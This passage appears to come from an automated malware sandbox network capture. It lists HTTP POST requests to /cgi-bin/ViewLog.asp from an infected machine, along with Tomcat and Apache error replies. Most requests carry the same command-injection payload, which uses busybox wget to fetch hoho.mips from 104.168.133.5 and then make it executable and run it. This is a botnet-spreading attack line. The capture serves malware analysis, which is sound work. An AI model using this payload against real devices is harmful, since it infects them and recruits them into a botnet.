2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:16:01.665659904 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:52 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              164192.168.2.143636294.190.181.2258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:45.974173069 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.200625896 CET89INHTTP/1.0 302 Redirect


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              165192.168.2.143704231.136.26.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.725961924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.767138004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:55.910892963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.942373991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:32.005321980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.155275106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              166192.168.2.144870231.136.173.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.726032019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.767121077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:55.910892963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.942364931 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:32.005337954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.155278921 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              167192.168.2.143916631.200.0.578080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.762001038 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              168192.168.2.145955631.171.228.1098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.775005102 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              169192.168.2.145983862.90.9.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:47.227345943 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:47.455945015 CET617INHTTP/1.1 302 Found
                                              Date: Thu, 23 Nov 2023 04:15:47 GMT
                                              Server: Apache/2.4.41 (Unix) OpenSSL/1.1.1 mod_fastcgi/mod_fastcgi-SNAP-0910052141
                                              Location: https://192.168.0.14:4443/cgi-bin/ViewLog.asp
                                              Content-Length: 229
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 34 34 34 33 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://192.168.0.14:4443/cgi-bin/ViewLog.asp">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              170192.168.2.144331831.136.105.478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:48.122977972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.711163044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
